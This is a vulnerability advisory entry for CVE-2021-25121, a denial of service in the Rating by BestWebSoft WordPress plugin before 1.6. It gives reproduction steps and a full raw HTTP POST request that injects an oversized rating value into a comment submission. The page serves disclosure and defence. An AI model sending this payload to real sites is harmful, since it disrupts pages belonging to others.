Lucene search
Drew JonesWPEX-ID:EFB1DDEF-2123-416C-A932-856D41ED836DHistoryMay 24, 2022 - 12:00 a.m.
Rating by BestWebSoft < 1.6 - Rating Denial of Service
2022-05-2400:00:00
Drew Jones
103
bestwebsoft
rating
denial of service
settings
discussion
plugin
burp
form parameter
security exploit
EPSS
0.001
Percentile
34.1%
The plugin does not validate the submitted rating, allowing submission of long integer, causing a Denial of Service on the post/page when a user submit such rating
Under Settings -> Discussion, uncheck "Comment must be manually approved"
Install and Enable Rating BestWebSoft plugin Change "Enable Rating for" to "All" (Works for others, but this allows guest to post) Change "My Rating Position" to "In comments"
Submit a valid comment and capture with Burp or another application. Change the post parameter "rtng_rating[0]" to a large integer such as 1000000000
POST /wp-comments-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 151
Connection: close
Cookie: [depends on plugin's settings]
Upgrade-Insecure-Requests: 1
rtng_show_title=1&rtng_rating%5B0%5D=1000000000&comment=aa&author=Yolo&email=krkgh%40jgoirtjg.com&url=&submit=Post+Comment&comment_post_ID=5887&comment_parent=0Related
patchstack
patchstack
cvelist
cvelist
CVE-2021-25121 Rating by BestWebSoft < 1.6 - Rating Denial of Service
2022-06-20 10:25:43
wpvulndb
wpvulndb
Rating by BestWebSoft < 1.6 - Rating Denial of Service
2022-05-24 00:00:00
nvd
nvd
CVE-2021-25121
2022-06-20 11:15:09
prion
prion
Design/Logic Flaw
2022-06-20 11:15:00
cnvd
cnvd
WordPress BestWebSoft plugin denial of service vulnerability
2022-06-22 00:00:00
cve
cve
CVE-2021-25121
2022-06-20 11:15:09